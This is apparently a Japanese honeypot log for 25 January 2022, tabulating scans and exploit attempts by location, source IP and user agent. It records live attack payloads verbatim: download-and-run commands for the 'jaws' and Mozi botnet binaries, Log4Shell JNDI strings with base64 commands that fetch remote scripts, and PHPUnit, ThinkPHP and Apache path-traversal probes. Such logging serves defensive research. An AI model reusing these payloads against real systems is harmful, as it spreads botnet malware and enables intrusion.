ハニーポット(仮) 観測記録 2022/01/25分です。
特徴
共通
D-link製品の脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
zgrabによるスキャン行為
/.envへのスキャン行為
Apache Tomcatへのスキャン行為
Location:JP
Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
IDBTE4M CODE87によるスキャン行為
/.gitへのスキャン行為
Apache Solrへのスキャン行為
Laravelへのスキャン行為
WordPress Pluginへのスキャン行為
WordPressへのスキャン行為
を確認しました。
Location:US
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
aiohttpによるスキャン行為
Laravelへのスキャン行為
85.206.160.115に関する不正通信
を確認しました。
Location:UK
Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
Apache Log4j2の脆弱性(CVE-2021-44228)を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
curlによるスキャン行為
Apache Solrへのスキャン行為
Laravelへのスキャン行為
phpMyAdminへのスキャン行為
5.188.210.227に関する不正通信
85.206.160.115に関する不正通信
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget 0.0.0.0/jaws; sh /tmp/jaws
Location:SG
Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
Apache Log4j2の脆弱性(CVE-2021-44228)を狙うアクセス
GPONルータの脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
Nessusによるスキャン行為
curlによるスキャン行為
.jsへのスキャン行為
Apache Solrへのスキャン行為
85.206.160.115に関する不正通信
UserAgentがHello, Worldであるアクセス
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget 0.0.0.0/jaws; sh /tmp/jaws
他
アクセス数推移
JP:総アクセス数:184 (前日比:61)
US:総アクセス数:49 (前日比:-31)
UK:総アクセス数:48 (前日比:8)
SG:総アクセス数:144 (前日比:-28)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
Location:JP
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 3.133.12.155 | United States |
1 | 3.238.16.141 | United States |
1 | 4.28.87.68 | United States |
63 | 13.82.110.208 | United States |
2 | 20.62.100.83 | United States |
1 | 42.238.172.235 | China |
1 | 44.202.23.255 | United States |
1 | 45.9.20.57 | Russia |
2 | 45.137.21.134 | Bangladesh |
9 | 45.146.165.37 | Russia |
40 | 54.152.74.220 | United States |
2 | 62.197.136.127 | Netherlands |
1 | 103.138.108.64 | Vietnam |
1 | 103.155.82.241 | Vietnam |
14 | 107.172.73.224 | United States |
2 | 107.189.28.51 | United States |
1 | 109.237.103.123 | Russia |
1 | 111.237.111.81 | Japan |
1 | 114.246.35.129 | China |
1 | 128.199.2.117 | United Kingdom |
1 | 132.145.39.16 | United States |
16 | 135.125.217.54 | France |
1 | 137.184.198.10 | United States |
1 | 157.245.39.22 | United States |
1 | 157.245.43.33 | United States |
1 | 159.223.178.212 | United States |
1 | 174.138.40.190 | United States |
1 | 178.62.30.6 | United States |
1 | 178.62.59.41 | United States |
2 | 185.254.196.217 | Ukraine |
4 | 185.254.196.218 | Ukraine |
1 | 192.241.211.96 | United States |
1 | 192.241.213.40 | United States |
2 | 198.46.171.11 | United States |
1 | 206.189.226.24 | United States |
1 | 206.189.226.33 | United States |
1 | 209.17.96.162 | United States |
1 | 209.141.33.65 | United States |
UserAgent一覧
件数 | UserAgent |
---|---|
5 | - |
1 | Go-http-client/1.1 |
1 | IDBTE4M CODE87 |
2 | Mozila/5.0 |
63 | Mozilla/5.0 (Linux x86_64; X11) AppleWebKit/536.30 (KHTML, like Gecko) Version/6.1.9 Safari/536.19 |
1 | Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 |
9 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
14 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36 |
40 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0 |
1 | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36 |
41 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
2 | Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2 |
2 | Mozilla/5.0 zgrab/0.x |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | \x03 |
||
1 | \x16\x03\x01\x01\xfa\x01 |
||
1 | \x16\x03\x01 |
||
44 | GET | /.env |
HTTP/1.1 |
1 | GET | /.git/config |
HTTP/1.1 |
1 | GET | /.local |
HTTP/1.1 |
1 | GET | /.production |
HTTP/1.1 |
1 | GET | /.remote |
HTTP/1.1 |
1 | GET | //admin/.env |
HTTP/1.1 |
1 | GET | //administrator/.env |
HTTP/1.1 |
1 | GET | //api/.env |
HTTP/1.1 |
1 | GET | //app/.env |
HTTP/1.1 |
1 | GET | //apps/.env |
HTTP/1.1 |
1 | GET | //assets/.env |
HTTP/1.1 |
1 | GET | //config/.env |
HTTP/1.1 |
1 | GET | //core/.env |
HTTP/1.1 |
1 | GET | //core/Datavase/.env |
HTTP/1.1 |
1 | GET | //core/app/.env |
HTTP/1.1 |
1 | GET | //cron/.env |
HTTP/1.1 |
1 | GET | //cronlab/.env |
HTTP/1.1 |
1 | GET | //database/.env |
HTTP/1.1 |
1 | GET | //en/.env |
HTTP/1.1 |
1 | GET | //exapi/.env |
HTTP/1.1 |
1 | GET | //lab/.env |
HTTP/1.1 |
1 | GET | //laravel/.env |
HTTP/1.1 |
1 | GET | //lib/.env |
HTTP/1.1 |
1 | GET | //psnlink/.env |
HTTP/1.1 |
1 | GET | //public/.env |
HTTP/1.1 |
1 | GET | //saas/.env |
HTTP/1.1 |
1 | GET | //site/.env |
HTTP/1.1 |
1 | GET | //sitemaps/.env |
HTTP/1.1 |
1 | GET | //tools/.env |
HTTP/1.1 |
1 | GET | //uploads/.env |
HTTP/1.1 |
1 | GET | //v1/.env |
HTTP/1.1 |
1 | GET | //v2/.env |
HTTP/1.1 |
1 | GET | //vendor/.env |
HTTP/1.1 |
1 | GET | //web/.env |
HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
1 | GET | /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> |
HTTP/1.1 |
1 | GET | /_ignition/execute-solution |
HTTP/1.1 |
1 | GET | /admin/.env |
HTTP/1.1 |
1 | GET | /api/.env |
HTTP/1.1 |
1 | GET | /api/ |
HTTP/1.1 |
1 | GET | /app/.env |
HTTP/1.1 |
1 | GET | /application/.env |
HTTP/1.1 |
1 | GET | /apps/.env |
HTTP/1.1 |
1 | GET | /auth/.env |
HTTP/1.1 |
1 | GET | /back/.env |
HTTP/1.1 |
1 | GET | /backend/.env |
HTTP/1.1 |
1 | GET | /blog/wp-includes/wlwmanifest.xml |
HTTP/1.1 |
1 | GET | /boaform/admin/formLogin?username=ec8&psd=ec8 |
HTTP/1.0 |
1 | GET | /cli/.env |
HTTP/1.1 |
1 | GET | /cluster/cluster/ |
HTTP/1.1 |
1 | GET | /cms/wp-includes/wlwmanifest.xml |
HTTP/1.1 |
1 | GET | /config/.env |
HTTP/1.1 |
1 | GET | /console/ |
HTTP/1.1 |
1 | GET | /core/.env |
HTTP/1.1 |
1 | GET | /cp/.env |
HTTP/1.1 |
1 | GET | /dependencies/.env |
HTTP/1.1 |
1 | GET | /deployment/.env |
HTTP/1.1 |
1 | GET | /dev/.env |
HTTP/1.1 |
1 | GET | /development/.env |
HTTP/1.1 |
2 | GET | /dispatch.asp |
HTTP/1.1 |
1 | GET | /docker/.env |
HTTP/1.1 |
1 | GET | /document/.env |
HTTP/1.1 |
1 | GET | /engine/.env |
HTTP/1.1 |
1 | GET | /favicon.ico |
HTTP/1.1 |
1 | GET | /framework/.env |
HTTP/1.1 |
1 | GET | /frontend/.env |
HTTP/1.1 |
1 | GET | /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 |
HTTP/1.1 |
1 | GET | /laravel-artisa/.env |
HTTP/1.1 |
1 | GET | /laravel/.env |
HTTP/1.1 |
1 | GET | /local/.env |
HTTP/1.1 |
1 | GET | /login/.env |
HTTP/1.1 |
1 | GET | /manager/html |
HTTP/1.1 |
1 | GET | /manager/text/list |
HTTP/1.1 |
1 | GET | /master/.env |
HTTP/1.1 |
1 | GET | /news/wp-includes/wlwmanifest.xml |
HTTP/1.1 |
1 | GET | /personal/.env |
HTTP/1.1 |
1 | GET | /private/.env |
HTTP/1.1 |
1 | GET | /project/.env |
HTTP/1.1 |
1 | GET | /protected/.env |
HTTP/1.1 |
1 | GET | /rest/.env |
HTTP/1.1 |
1 | GET | /search/.env |
HTTP/1.1 |
1 | GET | /server/.env |
HTTP/1.1 |
1 | GET | /shared/.env |
HTTP/1.1 |
1 | GET | /site/.env |
HTTP/1.1 |
1 | GET | /site/wp-includes/wlwmanifest.xml |
HTTP/1.1 |
1 | GET | /sito/wp-includes/wlwmanifest.xml |
HTTP/1.1 |
1 | GET | /solr/admin/info/system?wt=json |
HTTP/1.1 |
1 | GET | /src/.env |
HTTP/1.1 |
1 | GET | /system/.env |
HTTP/1.1 |
1 | GET | /test/wp-includes/wlwmanifest.xml |
HTTP/1.1 |
1 | GET | /vod_installer/.env |
HTTP/1.1 |
1 | GET | /vue/.env |
HTTP/1.1 |
1 | GET | /web/.env |
HTTP/1.1 |
1 | GET | /web/wp-includes/wlwmanifest.xml |
HTTP/1.1 |
1 | GET | /website/wp-includes/wlwmanifest.xml |
HTTP/1.1 |
1 | GET | /wordpress/wp-includes/wlwmanifest.xml |
HTTP/1.1 |
1 | GET | /wp-includes/wlwmanifest.xml |
HTTP/1.1 |
1 | GET | /wp/wp-includes/wlwmanifest.xml |
HTTP/1.1 |
1 | GET | /wp1/wp-includes/wlwmanifest.xml |
HTTP/1.1 |
1 | GET | /wp2/wp-includes/wlwmanifest.xml |
HTTP/1.1 |
1 | GET | /xmlrpc.php?rsd |
HTTP/1.1 |
1 | POST | //admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | POST | //api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | POST | //backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | POST | //blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | POST | //cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | POST | //demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | POST | //dev/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | POST | //laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | POST | //lib/phpunit/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | POST | //lib/phpunit/phpunit/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | POST | //lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | POST | //lib/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | POST | //new/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | POST | //old/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | POST | //panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | POST | //phpunit/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | POST | //phpunit/phpunit/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | POST | //phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | POST | //phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | POST | //protected/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | POST | //sites/all/libraries/mailchimp/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | POST | //vendor/phpunit/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | POST | //vendor/phpunit/phpunit/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | POST | //vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | POST | //vendor/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | POST | //wp-content/plugins/cloudflare/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | POST | //wp-content/plugins/dzs-videogallery/class_parts/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | POST | //wp-content/plugins/jekyll-exporter/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | POST | //wp-content/plugins/mm-plugin/inc/vendors/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | POST | //www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | POST | /Autodiscover/Autodiscover.xml |
HTTP/1.1 |
1 | POST | /HNAP1/ |
HTTP/1.0 |
2 | POST | /HNAP1/ |
HTTP/1.1 |
1 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh |
HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
Location:US
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 20.104.110.22 | United States |
1 | 20.114.244.110 | United States |
1 | 37.49.225.132 | Belize |
2 | 45.137.21.134 | Bangladesh |
6 | 45.146.165.37 | Russia |
6 | 51.79.29.48 | Canada |
3 | 89.248.165.52 | United Kingdom |
2 | 107.189.28.51 | United States |
3 | 107.189.29.181 | United States |
1 | 109.237.103.123 | Russia |
1 | 128.199.160.152 | United Kingdom |
1 | 137.184.198.10 | United States |
5 | 137.184.221.114 | United States |
1 | 157.245.39.24 | United States |
1 | 157.245.43.33 | United States |
1 | 157.245.43.242 | United States |
2 | 159.203.160.245 | United States |
1 | 185.40.4.128 | Seychelles |
1 | 185.220.101.41 | Germany |
1 | 192.241.213.152 | United States |
1 | 192.241.214.29 | United States |
1 | 194.182.168.118 | Switzerland |
1 | 198.46.154.137 | United States |
1 | 199.127.61.114 | United States |
1 | 206.189.226.24 | United States |
1 | 206.189.226.29 | United States |
1 | 209.17.97.90 | United States |
1 | 223.149.254.57 | China |
UserAgent一覧
件数 | UserAgent |
---|---|
6 | - |
6 | Mozila/5.0 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3829.0 Safari/537.36 Edg/77.0.197.1 |
6 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36 |
20 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
2 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 |
2 | Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2 |
2 | Mozilla/5.0 zgrab/0.x |
1 | Python/3.7 aiohttp/3.7.4.post0 |
1 | libwww-perl/6.61 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
3 | - |
||
1 | \x16\x03\x01 |
||
1 | CONNECT | 85[.]206[.]160[.]115:80 |
HTTP/1.1 |
22 | GET | /.env |
HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
1 | GET | /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> |
HTTP/1.1 |
1 | GET | /_ignition/execute-solution |
HTTP/1.1 |
1 | GET | /cluster/cluster/ |
HTTP/1.1 |
2 | GET | /config/getuser?index=0 |
HTTP/1.1 |
1 | GET | /console/ |
HTTP/1.1 |
2 | GET | /dispatch.asp |
HTTP/1.1 |
1 | GET | /favicon.ico |
HTTP/1.1 |
1 | GET | /level/15/exec/-/sh/run/CR |
HTTP/1.1 |
1 | GET | /manager/html |
HTTP/1.1 |
1 | GET | /manager/text/list |
HTTP/1.1 |
1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 |
HTTP/1.0 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
6 | POST | /HNAP1/ |
HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
Location:UK
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 5.188.210.227 | Russia |
1 | 34.75.236.135 | United States |
4 | 45.137.21.134 | Bangladesh |
9 | 45.146.165.37 | Russia |
8 | 47.90.183.194 | United States |
1 | 66.240.192.82 | United States |
1 | 79.124.62.106 | Bulgaria |
3 | 89.248.165.52 | United Kingdom |
2 | 94.232.43.63 | Russia |
1 | 107.189.12.178 | United States |
2 | 107.189.28.51 | United States |
2 | 107.189.29.181 | United States |
1 | 109.237.103.123 | Russia |
1 | 117.213.46.242 | India |
1 | 125.46.91.250 | China |
1 | 137.184.198.10 | United States |
3 | 140.246.143.76 | China |
1 | 142.93.215.37 | United States |
2 | 157.245.70.127 | United States |
1 | 192.241.205.177 | United States |
1 | 192.241.209.126 | United States |
1 | 209.17.97.98 | United States |
UserAgent一覧
件数 | UserAgent |
---|---|
14 | - |
1 | Hello, world |
5 | Mozila/5.0 |
3 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3464.0 Safari/537.36 |
9 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 6.2; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 |
1 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
4 | Mozilla/5.0 (compatible;) |
4 | Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2 |
2 | Mozilla/5.0 zgrab/0.x |
2 | curl/7.75.0 |
1 | t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//5[.]181[.]80[.]103:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IGN1cmwgaHR0cDovLzE5Mi45NS41MC4yMjgvYmlucy5zaCAtbyBiaW5zLnNoOyB3Z2V0IGh0dHA6Ly8xOTIuOTUuNTAuMjI4L2JpbnMuc2g7IGNobW9kIDc3NyBiaW5zLnNoOyBzaCBiaW5zLnNoOyBybSAtcmYgYmlucy5zaDsgaGlzdG9yeSAtYyA=}') |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
2 | - |
||
1 | 27;wget%20http[:]//%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ |
HTTP/1.0 | |
3 | \x03 |
||
1 | \x16\x03\x01\x01\xfc\x01 |
||
2 | \x16\x03\x01\x02 |
||
2 | \x16\x03\x01 |
||
1 | CONNECT | 85[.]206[.]160[.]115:80 |
HTTP/1.1 |
1 | GET | /.env |
HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
1 | GET | /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> |
HTTP/1.1 |
1 | GET | /HNAP1 |
HTTP/1.1 |
1 | GET | /_ignition/execute-solution |
HTTP/1.1 |
1 | GET | /ab2g |
HTTP/1.1 |
1 | GET | /ab2h |
HTTP/1.1 |
1 | GET | /cluster/cluster/ |
HTTP/1.1 |
1 | GET | /console/ |
HTTP/1.1 |
4 | GET | /dispatch.asp |
HTTP/1.1 |
1 | GET | /evox/about |
HTTP/1.1 |
1 | GET | /favicon.ico |
HTTP/1.1 |
1 | GET | /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 |
HTTP/1.1 |
1 | GET | /manager/html |
HTTP/1.1 |
1 | GET | /manager/text/list |
HTTP/1.1 |
1 | GET | /phpmyadmin/index.php |
HTTP/1.1 |
2 | GET | /pmd/index.php |
HTTP/1.1 |
1 | GET | /robots.txt |
HTTP/1.1 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+0[.]0[.]0[.]0/jaws;sh+/tmp/jaws |
HTTP/1.1 |
1 | GET | /solr/admin/collections?action=t(%27$%7B$%7Benv:BARFOO:-j%7Dndi$%7Benv:BARFOO:-:%7D$%7Benv:BARFOO:-l%7Ddap$%7Benv:BARFOO:-:%7D//5[.]181[.]80[.]103:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IGN1cmwgaHR0cDovLzE5Mi45NS41MC4yMjgvYmlucy5zaCAtbyBiaW5zLnNoOyB3Z2V0IGh0dHA6Ly8xOTIuOTUuNTAuMjI4L2JpbnMuc2g7IGNobW9kIDc3NyBiaW5zLnNoOyBzaCBiaW5zLnNoOyBybSAtcmYgYmlucy5zaDsgaGlzdG9yeSAtYyA=%7D%27)&wt=json |
HTTP/1.1 |
1 | GET | /solr/admin/info/system?wt=json |
HTTP/1.1 |
1 | GET | /text4041643039361 |
HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | GET | http[:]//5[.]188[.]210[.]227/echo.php |
HTTP/1.1 |
5 | POST | /HNAP1/ |
HTTP/1.1 |
1 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh |
HTTP/1.1 |
1 | POST | /sdk |
HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
Location:SG
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
82 | 20.74.250.212 | United States |
1 | 20.117.83.152 | United States |
1 | 34.75.236.135 | United States |
2 | 40.71.60.51 | United States |
2 | 45.9.20.57 | Russia |
2 | 45.137.21.134 | Bangladesh |
7 | 45.146.165.37 | Russia |
6 | 51.79.29.48 | Canada |
1 | 61.3.154.222 | India |
1 | 68.183.150.101 | United States |
1 | 78.128.112.14 | Bulgaria |
4 | 80.82.77.139 | United Kingdom |
3 | 89.248.165.52 | United Kingdom |
1 | 106.15.234.110 | China |
1 | 107.189.28.51 | United States |
2 | 107.189.29.181 | United States |
1 | 109.237.103.123 | Russia |
1 | 112.25.204.54 | China |
1 | 113.227.151.241 | China |
1 | 120.86.238.118 | China |
1 | 137.184.184.243 | United States |
1 | 143.198.183.232 | United States |
1 | 147.182.182.234 | United States |
2 | 157.230.216.203 | United States |
1 | 157.245.35.242 | United States |
1 | 157.245.39.22 | United States |
1 | 157.245.43.132 | United States |
2 | 157.245.47.22 | United States |
2 | 159.203.160.245 | United States |
1 | 178.62.30.6 | United States |
4 | 185.142.236.43 | Seychelles |
2 | 185.254.196.223 | Ukraine |
1 | 192.241.204.249 | United States |
1 | 192.241.213.239 | United States |
1 | 206.189.226.29 | United States |
1 | 206.189.226.57 | United States |
UserAgent一覧
件数 | UserAgent |
---|---|
18 | - |
1 | Hello, World |
1 | Hello, world |
3 | Mozila/5.0 |
74 | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0) |
1 | Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 |
2 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0 |
7 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
22 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
2 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 |
2 | Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2 |
2 | Mozilla/5.0 zgrab/0.x |
6 | Nessus |
1 | curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.27.1 zlib/1.2.3 libidn/1.18 libssh2/1.4.2 |
1 | t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//5[.]181[.]80[.]103:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IGN1cmwgaHR0cDovLzE5Mi45NS41MC4yMjgvYmlucy5zaCAtbyBiaW5zLnNoOyB3Z2V0IGh0dHA6Ly8xOTIuOTUuNTAuMjI4L2JpbnMuc2g7IGNobW9kIDc3NyBiaW5zLnNoOyBzaCBiaW5zLnNoOyBybSAtcmYgYmlucy5zaDsgaGlzdG9yeSAtYyA=}') |
1 | t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//5[.]181[.]80[.]103:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IHdnZXQgaHR0cDovLzUxLjE2MS42NC4xOTgvaW5zdGFsbC5zaDsgY2htb2QgNzc3IGluc3RhbGwuc2g7IHNoIGluc3RhbGwuc2g=}') |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
2 | - |
||
3 | \x03 |
||
2 | \x16\x03\x01\x02 |
||
1 | CONNECT | 85[.]206[.]160[.]115:80 |
HTTP/1.1 |
1 | GET | /.cobalt |
HTTP/1.1 |
23 | GET | /.env |
HTTP/1.1 |
2 | GET | /.well-known/security.txt |
HTTP/1.1 |
1 | GET | // |
HTTP/1.1 |
1 | GET | /:undefined |
HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
1 | GET | /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> |
HTTP/1.1 |
1 | GET | /ControlManager/default.htm |
HTTP/1.1 |
1 | GET | /HNAP1/ |
HTTP/1.1 |
1 | GET | /Home.do |
HTTP/1.1 |
1 | GET | /MSWSMTP/Common/Authentication/Logon.aspx |
HTTP/1.1 |
1 | GET | /ab2g |
HTTP/1.1 |
1 | GET | /ab2h |
HTTP/1.1 |
1 | GET | /admin.back |
HTTP/1.1 |
1 | GET | /admin/login.do |
HTTP/1.1 |
